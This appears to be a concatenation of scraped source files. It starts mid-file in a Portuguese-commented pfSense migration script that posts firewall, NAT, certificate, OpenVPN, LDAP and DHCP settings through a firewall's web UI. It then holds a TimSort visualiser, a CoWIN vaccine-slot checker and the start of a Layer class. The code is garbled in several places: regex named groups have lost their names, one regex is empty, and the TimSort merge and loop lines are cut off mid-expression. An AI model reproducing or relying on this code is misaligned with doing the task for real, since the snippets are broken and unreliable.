allow_redirects=False, data=data, headers=headers)\r\n if r.status_code == 302:\r\n print(f'regra de firewall criada com sucesso!')\r\n # aplicando as alterações\r\n r = self.http_session.post(f'{self.baseurl}/firewall_rules.php?if=lan', verify=False, data={self.hidden_name: self.hidden_value, 'act':'apply'})\r\n if r.status_code == 200:\r\n pass\r\n #print(f'configuração aplicada com sucesso!')\r\n return True\r\n \r\n else:\r\n print(f'erro ao cadastrar nova regra.')\r\n return False\r\n \r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def add_nat_rule(self, nat_rule):\r\n # acessing form of nat rules to grab token\r\n r = self.http_session.get(f'{self.baseurl}/firewall_nat_edit.php', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n # filling form data for new rule\r\n data = nat_rule\r\n data[self.hidden_name] = self.hidden_value\r\n \r\n \r\n #headers = r.headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/firewall_nat_edit.php'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n #print(f'DEBUG: {data}')\r\n \r\n # sending form of new rule:\r\n r = self.http_session.post(f'{self.baseurl}/firewall_nat_edit.php', verify=False, allow_redirects=False, data=data, headers=headers)\r\n if r.status_code == 302:\r\n print(f'regra de nat criada com sucesso!')\r\n # aplicando as alterações\r\n r = self.http_session.post(f'{self.baseurl}/firewall_nat.php', verify=False, data={self.hidden_name: self.hidden_value, 'apply':'Apply changes'})\r\n if r.status_code == 200:\r\n pass\r\n #print(f'configuração aplicada com sucesso!')\r\n return True\r\n \r\n else:\r\n print(f'erro ao cadastrar nova regra.')\r\n return False\r\n \r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def import_ca(self, ca):\r\n # acessing form of new ca (system-> trust->ca)\r\n r = self.http_session.get(f'{self.baseurl}/system_camanager.php?act=new', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = {\r\n self.hidden_name: self.hidden_value,\r\n 'id': '',\r\n 'act': 'new',\r\n 'descr': ca[\"descr\"],\r\n 'camethod': 'existing',\r\n 'cert': b64decode(ca[\"crt\"]).decode().replace(\"\\n\",\"\\r\\n\"),\r\n 'key': b64decode(ca[\"prv\"]).decode(),\r\n 'serial': '',\r\n 'caref': ca[\"refid\"],\r\n 'save': 'Save',\r\n\r\n }\r\n \r\n # fix for serial\r\n if int(ca[\"serial\"] ) > 0:\r\n data[\"serial\"] = ca[\"serial\"]\r\n \r\n #print(f'DEBUG CA: {data}')\r\n \r\n \r\n #headers = r.headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/system_camanager.php?act=new'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n #print(f'DEBUG: {form_data}')\r\n \r\n # sending form of ca import:\r\n r = self.http_session.post(f'{self.baseurl}/system_camanager.php?act=new', verify=False, allow_redirects=False, data=data, headers=headers)\r\n #print(f'DEBUG: {r.request.body}')\r\n #print(f'DEBUG: {r.request.headers}')\r\n \r\n if r.status_code == 302:\r\n print(f'CA {ca[\"descr\"]} importada com sucesso!')\r\n return True\r\n \r\n else:\r\n #print(f'erro ao importar CA. detalhes: {r.text}')\r\n print(f'erro ao importar CA.')\r\n return False\r\n \r\n \r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def import_certificate(self, cert):\r\n # acessing form of new ca (system-> trust->ca)\r\n r = self.http_session.get(f'{self.baseurl}/system_certmanager.php?act=new', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = {\r\n self.hidden_name: self.hidden_value,\r\n 'act': 'new',\r\n 'descr': cert[\"descr\"],\r\n 'certmethod': 'import',\r\n 'cert': b64decode(cert[\"crt\"]).decode(),\r\n 'key': b64decode(cert[\"prv\"]).decode(),\r\n 'certref': cert[\"refid\"],\r\n 'save': 'Save',\r\n\r\n }\r\n\r\n \r\n #print(f'DEBUG CERT: {data}')\r\n \r\n \r\n #headers = r.headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/system_certmanager.php?act=new'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n # sending form of ca import:\r\n r = self.http_session.post(f'{self.baseurl}/system_certmanager.php?act=new', verify=False, allow_redirects=False, data=data, headers=headers)\r\n #print(f'DEBUG: {r.request.body}')\r\n #print(f'DEBUG: {r.request.headers}')\r\n \r\n if r.status_code == 302:\r\n print(f'CERTIFICATE {cert[\"descr\"]} importado com sucesso!')\r\n return True\r\n \r\n else:\r\n #print(f'erro ao importar CA. detalhes: {r.text}')\r\n print(f'erro ao importar certificado.')\r\n return False\r\n \r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def import_crl(self, crl, root_config):\r\n # acessing main page of ca to get id (certref) of target ca\r\n r = self.http_session.get(f'{self.baseurl}/system_camanager.php', verify=False )\r\n \r\n # hold existing ca info\r\n existing_ca_info = {}\r\n \r\n # extract available ca's ids\r\n matches = re.findall('system_camanager.php\\?act=exp&id=(?P\\d+)', r.text)\r\n for ca_id in matches:\r\n print(f'looking for registered ca with id {ca_id}')\r\n # navigate into each ca edit page to get caref\r\n r = self.http_session.get(f'{self.baseurl}/system_camanager.php?act=edit&id={ca_id}', verify=False )\r\n #search for name and id\r\n ca_name_id_match = re.search('', r.text)\r\n print(f'found ca: {ca_name_id_match.group(\"refid\")} : {ca_name_id_match.group(\"caname\")}')\r\n # push info into existing ca list\r\n existing_ca_info[ca_name_id_match.group(\"caname\")] = ca_name_id_match.group(\"refid\")\r\n \r\n # get cert name from pfsense config\r\n target_ca = None\r\n ca_el = root_config.findall(\"ca\")\r\n for ca in ca_el:\r\n ca_attr = {}\r\n for attr in ca:\r\n ca_attr[attr.tag] = attr.text\r\n #print(f'DEBUG CA: {ca_attr}')\r\n if ca_attr['refid'] == crl['caref']:\r\n target_ca = ca_attr\r\n \r\n if target_ca is None:\r\n print(f'Error registering crl. could not find CA with refid {crl[\"caref\"]}')\r\n sys.exit(0)\r\n \r\n target_ca_name = target_ca[\"descr\"]\r\n print(f'DEBUG: crl {crl[\"descr\"]} will be registered for ca {target_ca_name} with refid {existing_ca_info[target_ca_name]}')\r\n\r\n # acessing page to register a new crl using ca ref\r\n #print(f'acessing page: {self.baseurl}/system_crlmanager.php?act=new&caref={existing_ca_info[target_ca[\"descr\"]]}')\r\n r = self.http_session.get(f'{self.baseurl}/system_crlmanager.php?act=new&caref={existing_ca_info[target_ca[\"descr\"]]}', verify=False )\r\n \r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = {\r\n self.hidden_name: self.hidden_value,\r\n 'act': 'new',\r\n 'descr': crl[\"descr\"],\r\n 'caref': existing_ca_info[target_ca_name],\r\n 'crlmethod': 'internal',\r\n 'crltext': '',\r\n 'lifetime': '9999',\r\n 'save': 'Save'\r\n }\r\n\r\n #print(f'DEBUG CRL FORM DATA: {data}')\r\n \r\n #headers = r.headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/system_crlmanager.php'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n # sending form of ca import:\r\n r = self.http_session.post(f'{self.baseurl}/system_crlmanager.php?act=new&caref={existing_ca_info[target_ca_name]}', verify=False, allow_redirects=False, data=data, headers=headers)\r\n \r\n if r.status_code == 302:\r\n print(f'CRL {crl[\"descr\"]} importado com sucesso!')\r\n return True\r\n \r\n else:\r\n #print(f'erro ao importar CA. detalhes: {r.text}')\r\n print(f'erro ao importar crl {crl[\"descr\"]}.')\r\n return False\r\n \r\n \r\n ## TODO\r\n # Register certificates present in CRL.\r\n # set certificates that make part of crl\r\n #r = self.http_session.get(f'{self.baseurl}/system_crlmanager.php?act=new&caref={existing_ca_info[target_ca[\"descr\"]]}', verify=False )\r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def import_openvpn_server(self, openvpn_config):\r\n # acessing form of new vpn ( vpn -> openvpn -> servers )\r\n r = self.http_session.get(f'{self.baseurl}/vpn_openvpn_server.php?act=new', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = {\r\n self.hidden_name: self.hidden_value,\r\n 'description': openvpn_config[\"description\"],\r\n 'mode': openvpn_config[\"mode\"],\r\n 'protocol': 'UDP',\r\n 'dev_mode': openvpn_config[\"dev_mode\"],\r\n 'interface': openvpn_config[\"interface\"],\r\n 'local_port': openvpn_config[\"local_port\"],\r\n 'tlsmode': openvpn_config[\"tls_type\"],\r\n 'tls': b64decode(openvpn_config[\"tls\"]).decode(),\r\n 'caref': openvpn_config[\"caref\"],\r\n 'crlref': openvpn_config[\"crlref\"],\r\n 'certref': openvpn_config[\"certref\"],\r\n 'crypto': openvpn_config[\"data_ciphers\"].split(\",\")[0],\r\n 'digest': openvpn_config[\"digest\"],\r\n 'cert_depth': openvpn_config[\"cert_depth\"],\r\n 'tunnel_network': openvpn_config[\"tunnel_network\"],\r\n 'tunnel_networkv6': '',\r\n 'local_network': openvpn_config[\"local_network\"],\r\n 'local_networkv6': '',\r\n 'remote_network': openvpn_config[\"remote_network\"],\r\n 'remote_networkv6': '',\r\n 'maxclients': openvpn_config[\"maxclients\"],\r\n 'compression': openvpn_config[\"compression\"],\r\n 'dynamic_ip': openvpn_config[\"dynamic_ip\"],\r\n 'netbios_ntype': openvpn_config[\"netbios_ntype\"],\r\n 'netbios_scope': openvpn_config[\"netbios_scope\"],\r\n 'custom_options': openvpn_config[\"custom_options\"],\r\n 'verbosity_level': openvpn_config[\"verbosity_level\"],\r\n 'reneg-sec': '',\r\n 'save': 'Save',\r\n 'act': 'new'\r\n }\r\n \r\n # fix for data\r\n if 'authmode' in openvpn_config:\r\n data['authmode[]'] = openvpn_config[\"authmode\"]\r\n if not 'UDP' in openvpn_config[\"protocol\"]:\r\n data[\"protocol\"] = openvpn_config[\"protocol\"]\r\n if 'dns_domain' in openvpn_config:\r\n data['dns_domain_enable'] = 'yes'\r\n data['dns_domain'] = openvpn_config[\"dns_domain\"]\r\n data['dns_server_enable'] = 'yes'\r\n data['dns_server1'] = openvpn_config[\"dns_server1\"]\r\n data['dns_server2'] = openvpn_config[\"dns_server2\"]\r\n data['dns_server3'] = openvpn_config[\"dns_server3\"]\r\n data['dns_server4'] = openvpn_config[\"dns_server4\"]\r\n data['push_register_dns'] = 'yes'\r\n if openvpn_config[\"username_as_common_name\"] == 'enabled':\r\n data['cso_login_matching'] = 'yes'\r\n\r\n #print(f'DEBUG VPN: {data}')\r\n\r\n #headers = r.headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/vpn_openvpn_server.php?act=new'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n # sending form of ca import:\r\n r = self.http_session.post(f'{self.baseurl}/vpn_openvpn_server.php?act=new', verify=False, allow_redirects=False, data=data, headers=headers)\r\n \r\n if r.status_code == 302:\r\n print(f'VPN {data[\"description\"]} importada com sucesso!')\r\n return True\r\n \r\n else:\r\n #print(f'erro ao importar CA. detalhes: {r.text}')\r\n print(f'erro ao importar vpn {data[\"description\"]}.')\r\n return False\r\n \r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def add_auth_server(self, auth_config):\r\n # acessing form of new auth server (system->access->servers)\r\n r = self.http_session.get(f'{self.baseurl}/system_authservers.php?act=new', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = {\r\n self.hidden_name: self.hidden_value,\r\n 'name': auth_config[\"name\"],\r\n 'type': auth_config[\"type\"],\r\n 'ldap_host': auth_config[\"host\"],\r\n 'ldap_port': auth_config[\"ldap_port\"],\r\n 'ldap_urltype': auth_config[\"ldap_urltype\"],\r\n 'ldap_protver': auth_config[\"ldap_protver\"],\r\n 'ldap_binddn': auth_config[\"ldap_binddn\"],\r\n 'ldap_bindpw': auth_config[\"ldap_bindpw\"],\r\n 'ldap_scope': auth_config[\"ldap_scope\"],\r\n 'ldap_basedn': auth_config[\"ldap_basedn\"],\r\n 'ldapauthcontainers': auth_config[\"ldap_authcn\"],\r\n 'ldap_tmpltype': 'msad',\r\n 'ldap_attr_user': auth_config[\"ldap_attr_user\"],\r\n 'save': 'Save'\r\n }\r\n \r\n # fix for data\r\n if auth_config[\"ldap_urltype\"] == \"SSL/TLS Encrypted\":\r\n data[\"ldap_urltype\"] = \"SSL - Encrypted\"\r\n if auth_config[\"ldap_urltype\"] == \"STARTTLS Encrypted\":\r\n data[\"ldap_urltype\"] = \"StartTLS\"\r\n if auth_config[\"ldap_extended_enabled\"] == \"yes\":\r\n data[\"ldap_extended_query\"] = auth_config[\"ldap_extended_query\"]\r\n \r\n \r\n #print(f'DEBUG AUTHSERVER: {data}')\r\n \r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/vpn_openvpn_server.php?act=new'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n # sending form of new auth server:\r\n r = self.http_session.post(f'{self.baseurl}/system_authservers.php?act=new', verify=False, allow_redirects=False, data=data, headers=headers)\r\n #print(f'DEBUG: {r.request.body}')\r\n #print(f'DEBUG: {r.request.headers}')\r\n \r\n if r.status_code == 302:\r\n print(f'AUTH {data[\"name\"]} importado com sucesso!')\r\n return True\r\n \r\n else:\r\n print(f'erro ao importar authserver {data[\"name\"]}.')\r\n return False\r\n\r\n\r\n \r\n \r\n #\r\n #\r\n #\r\n def add_static_route(self, route_config):\r\n # acessing form of new static route (system->routes->configuration)\r\n r = self.http_session.get(f'{self.baseurl}/ui/routes', verify=False )\r\n \r\n # getting the page token\r\n # match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n # if match is None:\r\n # print(f'error parsing token on firewall main page')\r\n # sys.exit(0)\r\n # self.hidden_name = match.group(\"fieldname\")\r\n # self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = {\r\n \"route\":{\r\n \"disabled\":\"0\",\r\n \"network\": route_config[\"network\"],\r\n \"gateway\": route_config[\"gateway\"],\r\n \"descr\": route_config[\"descr\"]\r\n }\r\n }\r\n \r\n \r\n #print(f'DEBUG route: {data}')\r\n #return\r\n \r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/vpn_openvpn_server.php?act=new'\r\n headers[\"x-requested-with\"] = \"XMLHttpRequest\"\r\n\r\n \r\n # sending form of new route:\r\n r = self.http_session.post(f'{self.baseurl}/api/routes/routes/addroute/', verify=False, json=data, headers=headers)\r\n \r\n if r.status_code == 200:\r\n print(f'ROUTE {data[\"route\"][\"descr\"]} importado com sucesso!')\r\n return True\r\n \r\n else:\r\n print(f'erro ao importar rota {data[\"route\"][\"descr\"]}.')\r\n return False\r\n\r\n\r\n\r\n #\r\n #\r\n #\r\n def set_dhcpd_config(self, dhcpd_config):\r\n # acessing form of dhcp configuration\r\n r = self.http_session.get(f'{self.baseurl}/services_dhcp.php?if={dhcpd_config[\"if\"]}', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = dhcpd_config\r\n data[\"submit\"] = \"Save\"\r\n data[self.hidden_name] = self.hidden_value\r\n \r\n \r\n print(f'DEBUG dhcpd: {data}')\r\n #return\r\n \r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/services_dhcp.php?if={data[\"if\"]}'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n\r\n \r\n # sending form of new dhcp instance config:\r\n r = self.http_session.post(f'{self.baseurl}/services_dhcp.php?if={data[\"if\"]}', verify=False, allow_redirects=False, data=data, headers=headers)\r\n \r\n if r.status_code == 302:\r\n #print(f'debug status: {r.headers}, {r.text}')\r\n print(f'DHCP CONFIG {data[\"if\"]} importado com sucesso!')\r\n return True\r\n \r\n else:\r\n print(f'erro ao importar config dhcp {data[\"if\"]}.')\r\n print(r.text)\r\n return False\r\n\r\n\r\n\r\n\r\n #\r\n #\r\n #\r\n def add_dhcpd_static_lease(self, lease):\r\n # acessing form of dhcp configuration\r\n r = self.http_session.get(f'{self.baseurl}/services_dhcp_edit.php?if={lease[\"if\"]}', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = lease\r\n data[\"submit\"] = \"Save\"\r\n data[self.hidden_name] = self.hidden_value\r\n \r\n \r\n #print(f'DEBUG dhcpd: {data}')\r\n #return\r\n \r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/services_dhcp_edit.php?if={data[\"if\"]}'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n\r\n\r\n # sending form of new static lease:\r\n r = self.http_session.post(f'{self.baseurl}/services_dhcp_edit.php?if={data[\"if\"]}', verify=False, allow_redirects=False, data=data, headers=headers)\r\n \r\n if r.status_code == 302:\r\n #print(f'debug status: {r.headers}, {r.text}')\r\n print(f'DHCP STATIC LEASE {data[\"descr\"]} importado com sucesso!')\r\n \r\n else:\r\n print(f'erro ao importar dhcp static lease {data[\"descr\"]}.')\r\n #print(r.text)\r\n return False\r\n \r\n \r\n # applying configuration\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/services_dhcp_edit.php?if={data[\"if\"]}'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n data = {\r\n 'apply': 'Apply changes',\r\n 'if': data[\"if\"]\r\n }\r\n \r\n # sending apply action\r\n r = self.http_session.post(f'{self.baseurl}/services_dhcp.php?if={data[\"if\"]}', verify=False, allow_redirects=False, data=data, headers=headers)\r\n \r\n if r.status_code == 302:\r\n # successfuly applied configuration\r\n return True\r\n else:\r\n print(f'erro ao aplicar configuração do dhcp leases.')\r\n return False\r\n\r\n\r\n\r\n\r\n","repo_name":"CitraIT/migrate_pfsense","sub_path":"src/firewall.py","file_name":"firewall.py","file_ext":"py","file_size_in_byte":35311,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"12934473390","text":"from OFA import *\n\nOptimum_Size = 32\n#Impacts On Chunk Size\n#Change Value For Tuning Program Efficiency\n#Approx Best 32 - 64\n\ndef CalcMinRun(n):\n\twhile n >= Optimum_Size:\n\t\tn = n>> 1\n\treturn n+1\n\ndef insertion_sort(arr,start,end):\n\n\tfor i in range(start+1,end+1):\n\t\tk = arr[i]\n\n\t\tj = i - 1\n\t\twhile k.h < arr[j].h and j >= start:\n\t\t\tinsert(j+1,arr[j],arr)\n\t\t\tj -= 1\n\n\t\tinsert(j+1,k,arr)\n\treturn arr[start:end+1]\n\n\ndef merge_sort(arr,left,mid,right):\n\tlarr = arr[left:mid]\n\tlenl = mid - left\n\n\trarr = arr[mid:right+1]\n\tlenr = right - mid\n\n\tp1 = p2 = 0\n\tk = left\n\twhile p1= size: end = size-1\n\t\tinsertion_sort(lst,start,end)\n\n\t#Merge Sort\n\tchunk = runs\n\twhile chunk <= size:\n\t\tchunk = 2 * chunk\n\t\tfor start in range(0,size,chunk):\n\t\t\tleft = start\n\t\t\tmid = min(left+(chunk//2),size-1)\n\t\t\tright = min(left+chunk,size-1)\n\t\t\tif mid <= right:\n\t\t\t\tmerge_sort(lst,left,mid,right)\n\n\nif __name__ == \"__main__\":\n\ttk.title(\"TimSort\")\n\tgenerate()\n\tbtn1 = Button(tk, text = 'Shuffle', bd = '5', command = lambda: shuffle())\n\tbtn2 = Button(tk, text = 'Sort', bd = '5', command = lambda: sort())\n\tbtn1.pack(side='left')\n\tbtn2.pack(side='left')\n\ttk.mainloop() ","repo_name":"Azanul/Sorting-Visualized","sub_path":"tim_sort.py","file_name":"tim_sort.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"45"} +{"seq_id":"35405380327","text":"import requests\nfrom fake_useragent import UserAgent\nimport json\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom playsound import playsound\nimport multiprocessing\nfrom configparser import ConfigParser\nimport sched, time\n\n# TO GET THE STATE ID\n# https://cdn-api.co-vin.in/api/v2/admin/location/states\n\n\n# TO GET THE DISTRICT ID\n# https://cdn-api.co-vin.in/api/v2/admin/location/districts/{state_id}\n\ndef check_availibilty(sc):\n \n temp_user_agent = UserAgent()\n browser_header = {'User-Agent': temp_user_agent.random}\n \n presentday = datetime.now()\n tomorrow = presentday + timedelta(1)\n date = tomorrow.strftime('%d-%m-%Y')\n print(\"looping for date {}\".format(date))\n \n configur = ConfigParser()\n configur.read('config.ini')\n pincode = configur.get('location','pincode')\n district_id = configur.get('location','district')\n \n request_url_pincode = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByPin?pincode={}&date={}\".format(pincode, date)\n request_url_disrict_id = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByDistrict?district_id={}&date={}\".format(district_id, date)\n \n \n response = requests.get(request_url_disrict_id, headers=browser_header)\n resp_json = json.loads(response.text)['sessions']\n \n df = pd.DataFrame(resp_json)\n df_min_age_limit = df['min_age_limit']\n df_availabilty = df['available_capacity_dose1']\n for key, value in df_availabilty.iteritems():\n if df_min_age_limit[key] == 18 and value > 0:\n print(key, value)\n playsound('Coldplay - Fix You.mp3')\n # Might as well play a song :p\n p = multiprocessing.Process(target=playsound, args=(\"Coldplay - Fix You.mp3\",))\n p.start()\n input(\"press ENTER to stop playback\")\n p.terminate()\n \n s.enter(4, 1, check_availibilty, (sc,))\n\ns = sched.scheduler(time.time, time.sleep)\ns.enter(0, 1, check_availibilty, (s,))\ns.run()\n\n\n\n","repo_name":"sarthakaggarwal97/cowin-vaccine-prompter","sub_path":"Vaccine Prompter.py","file_name":"Vaccine Prompter.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"15575354082","text":"import copy\nfrom .item import Item\n\n\nclass Layer(Item):\n\n Item.registerProperties((\n { 'attr': 'name' },\n { 'attr': 'description' },\n { 'attr': 'order', 'type': int, 'default': -1 },\n { 'attr': 'notes' },\n { 'attr': 'active', 'type': bool, 'default': False },\n { 'attr': 'itemProperties', 'type': dict },\n { 'attr': 'storeGeometry', 'type': bool, 'default': False }\n ))\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.isLayer = True\n self._scene = kwargs.get('scene')\n if not 'itemProperties' in kwargs: # avoid shared default value instance\n self.prop('itemProperties').set({}, notify=False)\n\n def __repr__(self):\n return super().__repr__(exclude='itemProperties')\n\n def __lt__(self, other):\n if self.name() is not None and other.name() is None:\n return True\n elif self.name() is None and other.name() is not None:\n return False\n elif self.name() is None and other.name() is None:\n return True\n return self.name() < other.name()\n\n ## Cloning\n\n def clone(self, scene):\n from .layeritem import LayerItem\n x = super().clone(scene)\n stuff = copy.deepcopy(self.itemProperties())\n x.prop('itemProperties').set(None, notify=False) # avoid equality check\n x.prop('itemProperties').set(stuff, notify=False)\n for layerItem in scene.find(types=LayerItem):\n if self.id in layerItem.layers():\n layers = list(layerItem.layers())\n layers.append(x.id)\n layerItem.setLayers(layers)\n return x\n\n def remap(self, map):\n \"\"\" TODO: Map itemProperties. \"\"\"\n return False\n\n ## Properties\n\n def onProperty(self, prop):\n isChanged = False\n if prop.name() == 'storeGeometry' and not prop.get():\n # Setting `storeGeometry` to False clears geometry values\n itemProps = copy.deepcopy(self.itemProperties())\n for itemId, values in itemProps.items():\n if 'size' in values:\n del values['size']\n isChanged = True\n if 'itemPos' in values:\n del values['itemPos']\n isChanged = True\n super().onProperty(prop)\n if isChanged:\n self.setItemProperties(itemProps)\n if self.scene():\n self.scene().updateActiveLayers(force=True)\n\n\n ## Item property storage\n\n def itemName(self):\n return self.name()\n\n def setScene(self, scene):\n self._scene = scene\n\n def scene(self):\n return self._scene\n\n def getItemProperty(self, itemId, propName):\n # {\n # id: {\n # 'propName': value,\n # 'propName': value\n # }\n # }\n values = self.itemProperties().get(itemId)\n if values and propName in values:\n # self.here(self.id, itemId, propName, 